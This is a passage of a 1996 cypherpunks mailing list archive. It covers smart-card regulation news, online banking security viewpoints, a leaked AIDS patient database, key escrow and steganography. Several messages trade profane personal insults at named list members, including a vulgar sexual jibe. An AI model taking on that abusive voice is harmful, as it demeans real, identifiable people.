smart card technology in North America. Its primary mission is to bring
together in an open forum, leaders from both the private and public
sectors to address topics associated with the development and evolution
of smart card technology applications.

The Forum was established in September 1993 and currently has more than
225 corporate and government members including: Chase Manhattan,
Citibank, Bellcore, MCI, MasterCard, Visa, IBM, Microsoft, Mobil Oil,
Schlumberger, Gemplus, Delta Airlines, U.S. Postal Service, the Federal
Reserve, U.S. Department of Treasury and U.S. Department of Defense.



Associated Press: September Wednesday, September 18, 1996

As Electronic Cash Emerges In U.S., Regulation In Question

By Guy Dixon

NEW YORK-- As microchip-embedded smart cards hit the market, U.S. banks
and credit-card companies are hedging their bets.

They don't want regulations that prevent new applications for smart-card
technology - from simple cashless purchases to potential uses like bank
or credit-card fund transfers, all with a single card.

But they also quietly welcome rules that could boost their market share
over other companies issuing competing smart cards.

The main issue is whether the U.S. Federal Reserve Board will require
smart-card issuers to provide receipts for all sorts of electronic cash
transactions, a move that could play to the strength of the credit card
issuers that now dominate electronic transactions by applying rules they
must follow already for conventional credit and debit cards.

Established card companies which have dominated the U.S. credit-card
market since the 1960s are hoping government policy on electronic cash
will follow the lines of current bank and credit card regulation.

To address some of these concerns, the U.S. Treasury will host a
conference on September 19-20 in Washington, D.C. on the role of
government in electronic money and banking. Scheduled speakers include
Treasury Secretary Robert Rubin, Federal Reserve Board Chairman Alan
Greenspan, and Citicorp Chairman and CEO John Reed.

So far, the Fed is taking a wait-and-see approach on emerging electronic
money. 'The general consensus is that we don't want to over-regulate and
stifle innovation,' said Washington Fed spokesman Joe Coyne.

Yet as new digital cash products hit the market, many say regulators
will have to adapt existing rules to the emerging electronic cash
market.

Banks, in particular, worry that if regulation is too lax, all sorts of
non-financial companies could flood the market with alternative cash
forms. They worry about being driven out of the electronic market by
competition, said Gerald O'Driscoll, vice-president and director of
policy analysis at Citicorp.

Analysts point out that regional and long-distance phone companies,
along with other large and trusted companies, could easily market their
own smart cards to customers, such as a smart-card version of AT&T
Corp.'s Universal card. Indeed, AT&T is collaborating with National
Westminster Bank PLC to develop smart cards in the U.S.

The problem with any new regulation is that no one knows what type of
smart cards the market will embrace.

Smart cards are currently being test-marketed primarily as stored-value
cards, holding a limited cash amount that a cardholder can use for
purchases until the card runs out.

Yet with a smart card's microchip able to hold up to 80 times more
information than the magnetic strips on conventional credit cards, many
in the industry see the distinctions between bank cards, credit cards
and store-value cards blurring to the point where a single smart card
could do the work of all three.

European credit cards already commonly come equipped with microchips,
allowing merchants to verify a payment at the point of purchase. And
stored-valued telecom cards with tiny chips are everywhere.

'In the end, it comes down to which features people will pay for,' said
Lawrence White, economist and electronic commerce analyst at the
University of Georgia. 'And that is the danger of regulation jumping the
gun.'

Visa USA's test run of smart cards in Atlanta during the Olympic Games
featured cards that used only a fraction of a microchip's potential. The
cards stored amounts of up to $100 which cardholders could then draw on
for purchases.

Some Atlanta banks, such as First Union, went one step further, issuing
cards whose value could be reloaded.

In another promotional blitz, participants at Vancouver's international
AIDS conference this summer could buy VISA Cash cards for use at
conference venues. Later this year, VISA plans another trial run of
stored-value smart cards in Manhattan's Upper West Side with MasterCard,
Citibank and Chase Manhattan.

These smart cards, typically sold in $10, $20, $50 and $100
denominations, differ from debit cards, such as checking cards which
already are being distributed widely by many banks in the United States
and Canada.

When a debit card is inserted into a merchant's card reader, the amount
of the purchase is deducted from the buyer's bank account. Because there
is a transfer of funds, the merchant's card-reading device has to be
connected to a bank or credit card company by phone lines.

Smart cards, however, can transfer a certain amount of funds from the
card itself to a card-reading device usually without having to go
on-line.

Not all smart cards are alike. A leading competitor to VISA Cash and
MasterCard's smart cards is National Westminster Bank's Mondex card, now
being test-marketed in the U.K. and soon in Canada.

Mondex cards are stored-value cards, with the added feature that the
funds can be transferred electronically to another Mondex card, allowing
a card-owner to give money to someone else in the same way one can with
cash, said Fred Billings, a Mondex developer at the Royal Bank of
Canada.

AT&T is currently in an alliance with NatWest to develop the Mondex card
in the U.S., said Mitch Montagna, spokesman for AT&T Universal Card
Services.

VISA's technology, on the other hand, is geared more toward the
company's long-term approach of sticking to established credit-card
billing and account practices, a traditional market niche VISA want to
hold on to with affliated banks, said VISA USA Executive Vice-President
Rosalind Fisher.

'We are riding that horse right now, but we'll have to see which system
the market takes to,' Fisher said.

But some digital cash developers continue to worry that any regulatory
move, once it comes, may be the wrong one for their product.

Much of the debate hinges on Regulation E of the 1976 Electronic Funds
Transfer Act, say analysts.

Reg E requires issuers of ATM and other electronic fund transfer cards
to provide receipts and account statements to cardholders. It also
requires issuers to assume certain liabilities if funds are
electronically lost or stolen.

Stored-value smart cards are seen as largely exempt from this
regulation, at least for the time being.

The Fed is still weighing the impact of cards in denominations of $100
or less. But the industry is going on the assumption that stored-value
cards of $100 and under will not require receipts or credit statements,
said VISA USA's Fisher.



WNET's Future of Money: September 16, 1996


Viewpoints

Is Cyberspace Safe for Financial Transactions Today?

YES.

William M. Randle, Senior Vice President and Director of Marketing,
Huntington Bancshares, Inc.

Some cyberspac transactions can be made very secure with technology in
use today.

But... The security currently in place is not ready to safeguard fast,
simple, low-cost transactions that would allow customers to order items
and authorize direct bank payment to the merchant. That would require
the financial information pathways between banks to be protected by
public-private key encryption, such as RSA encryption, invulnerable to
unauthorized persons. And the value of encryption depends on a reliable
authentication procedure, assuring that both senders and receivers of
financial information are who they say they are.

A variety of solutions to protect every stage of cyberspace transactions
have been proposed.

I am most impressed with the system in use at Security First National
Bank,

the first Web-only bank, as well as at Huntington National Bank; it has
been approved by the government for secure electronic banking
transactions, and has been proven over time. The system server, the
Hewlett-Packard Virtual Vault, has been used by the Department of
Defense for a number of years, and the banking software was developed by
5 Paces Technology in Atlanta.

The problem of authentication is harder to solve. Real-time settlement
of third-party transactions will require all insured financial services
institutions to agree on a central trusted authority to provide for the
safety and soundness of the future electronic payment system and insure
privacy of information for all involved.

Not only must the authentication procedure be reliable---it must also be
perceived as reliable, and implicitly trusted by buyers and sellers, if
electronic commerce is to grow to its full potential.

Currently, the banking industry is engaged in a collaborative effort to
evaluate the technology that exists today, with a view toward the
creation of such an authority.

As the group most knowledgeable and experienced in handling money safely
and efficiently, and which has long held the public trust in financial
matters, it is to be hoped that they succeed. When they do, the answer
to the question "is cyberspace safe for financial transactions today?"
can be answered with an unqualified Yes."

NO.

Colin Crook, Senior Technology Officer, Citibank.

The fact is that secure financial transactions cannot be assured today
in the new and dramatically changing landscape of cyberspace.

Market participants need to improve security and learn more about doing
business in the electronic marketplace before providing assurance to
their customers that they can safely do business there.

Companies must be honest with their customers, making them aware of the
risks of doing business in cyberspace and providing assurance that the
enterprise values the customer's security and privacy.

Today we are witnessing a series of experiments in electronic commerce,
experiments conducted by all sorts of companies. These opportunities for
learning-- on the part of both market participants and customers--will
lead to further improved products and to levels of security that
approach, or even surpass, the levels present today outside of
cyberspace.

The experiments are challenging the capabilities of both the technology
and the enterprise itself, and the willingness of the customer to accept
new and often novel ways of doing business.

Customers value this kind of experimentation and innovation; however,
where the customer's money is concerned, we at Citibank have learned
that trust is paramount! In this context, managing the balance of the
level of security with the factors of customer convenience and business
opportunity becomes the focus in moving forward.

Companies must manage risk so as not to compromise customer trust.

Because some companies-- mostly non-traditional providers of financial
services-- have released products very quickly, a major concern is that
ill-conceived or hasty experiments may cause damage to the reputation of
the entire marketplace.

Because absolute security is impossible, an overriding consideration for
security and customer trust must dominate the experiments- -which
Citibank and other institutions with long histories of customer
relationships emphasize in their approaches to cyberspace transactions.

Customers already understand and accept the risks associated with credit
cards and other financial instruments.

Customers in cyberspace should be aware of the experimental nature of
this new business environment and use caution before taking on the risks
contained within it.

As Senior Vice President and Director of Marketing and Strategic
Planning at Huntington Bancshares Inc., William M. Randle has developed
direct service channels, including Huntington Access, which uses
teleconferencing and other electronic channels in the world's first
complete virtual branch offices. On June 2 of this year, Huntington
launched a Web-based bank.

Colin Crook is Senior Technology Officer, Citibank. He is responsible
for establishing technology policy and standards, introducing new
technology, evaluating the quality and direction of system efforts, and
introducing technology policy within the corporation.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Sat, 21 Sep 1996 01:48:14 +0800
To: cypherpunks@toad.com
Subject: "Confidential" medical databases
Message-ID: <Pine.GSO.3.95.960920104636.27884C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain





AP, 9/19/96:

Copies of a confidential computer disk containing the names of 4,000 
AIDS patients were shipped anonymously to two newspapers by
someone who claimed a [Florida] state health worker had been showing it 
on his laptop computer to friends outside a gay bar. 
   
William B. Calvert III, 35, of Treasure Island, was one of only three state
Department of Health and Rehabilitative Services employees with authorized
access to the confidential information. 
   
Calvert was suspended with pay Thursday as the Florida Department of Law
Enforcement and HRS investigated the breach. 

"This is very serious. We are not aware of any breach of confidentiality of
this magnitude," Jay Coburn of the AIDS Action Council in Washington, D.C. 
said Thursday. 
  
 Nobody knows how many copies of the disk have been made, or who has them. 
If the allegations prove true, it could be the worst violation of AIDS
confidentiality in history. 

[...]

bd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brianh@u041.oh.vp.com (Brian Hills)
Date: Sat, 21 Sep 1996 02:11:26 +0800
To: cypherpunks@toad.com
Subject: ANYONES CREDIT CARD # per your request.
Message-ID: <m0v476x-0002QXC@u041.oh.vp.com>
MIME-Version: 1.0
Content-Type: text/plain


Thought this would be appropriate to the list

Forwarded message:
> From u082.wi.vp.com!alis Fri Sep 20 10:57:39 1996
> Message-Id: <m0v46wy-0002J9C@u082.wi.vp.com>
> From: alis@u082.wi.vp.com (Ali Sajanlal)
> Subject: Credit Card information (fwd)
> To: nd@u082.wi.vp.com
> Date: Fri, 20 Sep 96 9:53:03 CDT
> X-Mailer: ELM [version 2.3 PL8]
> 
> Forwarded message:
> > Date: 20 Sep 96 18:38:16 
> > Subject: Credit Card information
> > > ______________________________ Forward Header __________________________________
> > Subject: FYI - Check this out
> > Author:  alis@u082.wi.vp[.com
> > Date:    9/20/96 10.00 AM
>  
> > FYI - Check this out
> >      
> > Unfortunately, this message needs to be propagated to protect all of us.
> >      
> > Note: Lexis-Nexis is only accepting written or fax requests.  You have the 
> > option to fax your removal request to (513) 865-1930 state your full name 
> > and complete address.  Or mail the request to:
> >         Lexis-Nexis
> >         Attn: P-Track
> >         P.O. Box 933
> >         Dayton, Ohio
> >         45401-0933
> >      
> >      
> > >Subject: FYI 
> > >Author:  Nathan Judge at NYERPOC 
> > >Date:    9/16/96 2:42 PM 
> > >
> > >Your name, social security number, current address, previous addresses, 
> > >mother's maiden name, birth date and other personal information are now 
> > >available to anyone with a credit card through a new Lexis database called 
> > >P-Trax.  As I am sure you are aware, this information could be used to 
> > commit
> > >credit card fraud or otherwise allow someone else to use your identity. 
> > >
> > >You can have your name and information removed from this list by making a 
> > >telephone request.  Call (800)543-6862, select option 4 and then option 3 
> > >("all other questions") and tell the representative answering that you wish 
> > >to remove your name from the P-trax database.  You may also send a fax to 
> > >(513) 865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, 
> > >Ohio 45401-0933.  Sending physical mail to confirm your name has been 
> > removed
> > >is always a good idea.
> > >      
> > >As word of the existence of this database has spread on the net, 
> > Lexis-Nexis
> > >has been inundated with calls, and has set up a special set of operators to 
> >      
> > >handle the volume.  In addition, Andrew Bleh (rhymes with "Play") is a 
> > >manager responsible for this product, and is the person to whom complaints 
> > >about the service could be directed.  He can be reached at the above 800 
> > >number.  Ask for extension 3385.  According to Lexis, the manager 
> > responsible 
> > >is Bill Fister at extension 1364.
> > >
> > >Please forward this e-mail to everyone we know. 
> > 
> > 
> > 
>  Ali S.
> 
> -- 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 


-- 
//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ 
   Brian Hills
   Varco-Pruden Buildings
   1202 Industrial Dr.        
   Van Wert, OH 45891           
   419.238.9533 - brianh@u041.oh.vp.com
\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sat, 21 Sep 1996 03:21:54 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Stego inside encryption
In-Reply-To: <n1368993974.6219@mail.ndhm.gtegsc.com>
Message-ID: <3242C142.4A37@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> Mullen Patrick wrote:
> > To take this one step further, has anyone tried to ever use this
> > method as an encryption method?  You could hide data in a stream of
> > random bits, using position as the encryption method.

It doesn't matter *what* you do with your bits.  The key thing to
remember when analyzing your encryption method is that the foundation
of your security rests on the difficulty of reversing the numeric
sequence that drives the encryption.

If I know you're using this RNG-driven steganographic message mixer,
then if I can break your RNG I'm done.  If I know you're scrambling
bits in a file according to an RNG, if I break your RNG I'm done.
The key is therefore to make the RNG cryptographically secure.  Once
you've done that, then there's questionable value in doing anything
fancier than straight CBC (or something like that) to encrypt your
plaintext.

Note that simple functional composition of one or more simple insecure
RNG's does not necessarily give you a stronger RNG (in fact it usually
doesn't).  Cheap RNG's like what you get from the old UNIX "rand()"
are simple little linear functions, which when composed give you
more simple functions.

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sat, 21 Sep 1996 03:23:01 +0800
To: Rick Osborne <osborne@gateway.grumman.com>
Subject: Re: CNET Digital Dispatch  Vol. 2 No. 38
In-Reply-To: <3.0b19.32.19960920021220.0050fc50@gateway.grumman.com>
Message-ID: <3242C2A2.4947@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Rick Osborne wrote:
> did they mean DES or is the EDS something I'm not aware of.

EDS is "Electronic Data Systems", the company Ross & a buddy started
back in the late 60's/early 70's.  That's where Ross made his money.

EDS is a place that when Ross was in charge (and maybe still today)
was a lot like what Grumman sounds like in terms of employee
security issues.  Armed guards patrolled the computer rooms when I
was working there (1979).

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 04:57:42 +0800
To: cypherpunks@toad.com
Subject: Re: The periodic caveat about Timmy May
In-Reply-To: <v01540b01ae685c6928b3@[150.160.45.150]>
Message-ID: <Rk9JuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From DMiskell@envirolink.org  Fri Sep 20 10:22:57 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 11:09:08 EDT
	for dlv
Received: from uhost1.servtech.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA16482 for dlv@bwalk.dm.com; Fri, 20 Sep 96 10:22:57 -0400
Received: from mocha.hotliquid.com (mocha.hotliquid.com [204.249.118.9]) by uhost1.servtech.com (8.7.6/8.7.3) with SMTP id OAA03529; Fri, 20 Sep 1996 14:22:53 GMT
Received: from [150.160.45.150] by mocha.hotliquid.com (SMI-8.6/SMI-SVR4)
	id KAA03478; Fri, 20 Sep 1996 10:18:02 -0400
X-Sender: darius@hotliquid.com
Message-Id: <v01540b01ae685c6928b3@[150.160.45.150]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 20 Sep 1996 09:38:26 -0500
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Subject: Re: The periodic caveat about Timmy May
Cc: cypherpunks@toad.com

>attila <attila@primenet.com> writes:
>
>> In <199609190517.HAA00851@basement.replay.com>, on 09/19/96
>>    at 07:17 AM, nobody@flame.alias.net (Anonymous) said:
>>
>> = .Timmy May habitually digs into his cesspool of a mind for his
>> = .mailing list fertilizer.
>>
>>         this is humour.   it tickles the imagination, and the reference
>>     to tim is lost!
>
>Can we get all this non-crypto-relevant shit off of this mailing list please?
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Sorry, dear, but complaining isn't going to change it, and simple telling people
to shut the fuck up is going to go nowhere.  If you want solely crypto relevent
material, subscribe to the filtered list.  I mean, come on -- you know this list
is suseptable (sp?) to noise and spam.

Besides, people suggest to me that you are the anonymous mailer.  So maybe you
should keep a low profile on this.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 21 Sep 1996 06:06:10 +0800
To: cypherpunks@toad.com
Subject: Re: monkey-wrenching GAK
In-Reply-To: <ae6702a10202100484d8@[207.167.93.63]>
Message-ID: <199609201023.LAA00097@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes on cpunks:
> Ray Arachellian <sunder@brainlink.com> writes:
> >Another thing you can do: generate huge key pairs all day long and submit
> >them to the NSA.  If enough people do this, they will be flooded and
> >overworked [...]
>
> Ah, but what about the _fee_ for registering a key? You really didn't think
> this would be free, did you?

I agree.  With the aim of enforcing True Names, this might also get
tied to an internet drivers license (and your fingerprints (the
physical kind), social security number etc, much like car DLs (from
the other thread)).

> (Note: One of my biggest objections to GAK, besides the political/civil
> rights issue, is what it does to systems which generate lots and lots of
> keys on an ad hoc, continuing basis. 

Yeah, kind of wrecks all the current uses of forward secrecy, DH in IP
link level encryption; temporary RSA keys, and DH used by SSL, and so
on.

The fact that these things are currently in world wide use on a large
scale presents the US law enforcement with problems.  They'd need to
"unpublish", and recall a *lot* of software.  Some of the non-US folks
might not be so keen to do a GAK enabling downgrade.

Adam
--
exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 05:01:56 +0800
To: cypherpunks@toad.com
Subject: Re: CIA hacked
In-Reply-To: <v01540b02ae685d525f6c@[150.160.45.150]>
Message-ID: <mL9JuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From DMiskell@envirolink.org  Fri Sep 20 10:26:25 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 11:09:09 EDT
	for dlv
Received: from uhost1.servtech.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA16770 for dlv@bwalk.dm.com; Fri, 20 Sep 96 10:26:25 -0400
Received: from mocha.hotliquid.com (mocha.hotliquid.com [204.249.118.9]) by uhost1.servtech.com (8.7.6/8.7.3) with SMTP id OAA03565; Fri, 20 Sep 1996 14:26:20 GMT
Received: from [150.160.45.150] by mocha.hotliquid.com (SMI-8.6/SMI-SVR4)
	id KAA03490; Fri, 20 Sep 1996 10:21:30 -0400
X-Sender: darius@hotliquid.com
Message-Id: <v01540b02ae685d525f6c@[150.160.45.150]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 20 Sep 1996 09:41:54 -0500
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
From: DMiskell@envirolink.org (Daniel Christopher Miskell)
Subject: Re: CIA hacked
Cc: tcmay@got.net

>>From remailer@mailhub.bart.nl  Thu Sep 19 13:18:03 1996
>Received: by bwalk.dm.com (1.65/waf)
>        via UUCP; Thu, 19 Sep 96 16:10:20 EDT
>        for dlv
>Received: from spoof.bART.nl by uu.psi.com (5.65b/4.0.061193-PSI/PSINet)
>via SMTP;
>        id AA03960 for dlv@bwalk.dm.com; Thu, 19 Sep 96 13:18:03 -0400
>Received: (from remailer@localhost) by spoof.bart.nl (8.7.5/8.6.8) id
>TAA28972 for dlv@bwalk.dm.com; Thu, 19 Sep 1996 19:19:58 +0200 (MET DST)
>Date: Thu, 19 Sep 1996 19:19:58 +0200 (MET DST)
>Message-Id: <199609191719.TAA28972@spoof.bart.nl>
>To: dlv@bwalk.dm.com
>From: remailer@2005.bart.nl (Anonymous)
>Comments: Please report misuse of this automated remailing service to
><remailer-admin@remailer.nl.com>
> The contents of this message are neither approved or
> condoned by nl.com or our host bART Internet.
> *** Replying to it will not send your reply to the sender ***
> There is no way to determine the originator of this message. If you wish
>to be blocked from receiving all anonymous mail, send your request to the
><remailer-operators@c2.org> mailing list.  The operator of this particular
>remailer can be reached at <remailer-admin@remailer.nl.com>
>Subject: Re: CIA hacked
>
>Return-Path: <cypherpunks-errors@toad.com>
>To: cypherpunks@toad.com
>Subject: Re: CIA hacked
>From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Comments: Dole/Kemp '96!
>Date: Thu, 19 Sep 96 08:08:39 EDT
>Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
>Sender: owner-cypherpunks@toad.com
>
>Mike van der Merwe <mikev@is.co.za> writes:
>> I'm sure we will find out in a few years that Microsoft invented the
>> Net.  Or brought it to the masses.  Or saved it from a certain and
>> early demise.  Or all of the above.
>>      JAMES SEYMOUR
>
>>Dr. John M. Grubor created the 'net.
>
>Who created you? You tub of shit?


Dude, why do you even bother?  It is simply not constructive to keep insulting
and stabbing at people.  You gripe about the non-crypto-relevent stuff, then
you go and create it repeatedly.  If you don't like what people have to say,
take your potty mouth to another list.

Daniel.

--
If in fact we are the only intelligent life on this planet, why the fuck are
we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 06:28:20 +0800
To: cypherpunks@toad.com
Subject: Re: [joke, non-code] Re: Get this for a snake-oil example :
In-Reply-To: <843230178.6534.0@fatmans.demon.co.uk>
Message-ID: <Nm9JuD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From paul@fatmans.demon.co.uk  Fri Sep 20 10:51:21 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 11:09:22 EDT
	for dlv
Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA19108 for dlv@bwalk.dm.com; Fri, 20 Sep 96 10:51:21 -0400
Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net  id ad15131;
          20 Sep 96 14:41 GMT
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
           id aa06534; 20 Sep 96 15:36 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP 
	id AA843156112 ; Thu, 19 Sep 96 18:01:52 +0000
Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
From: paul@fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Thu, 19 Sep 1996 18:01:50 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: [joke, non-code] Re: Get this for a snake-oil example :
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <843230178.6534.0@fatmans.demon.co.uk>


> > Shamster: SHA-enabled biocomputing hamster.
> 
> I'm sure Timmy would like to wrap one up in duct tape and shove it
> up his ass...

How witty and subtle

Hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha
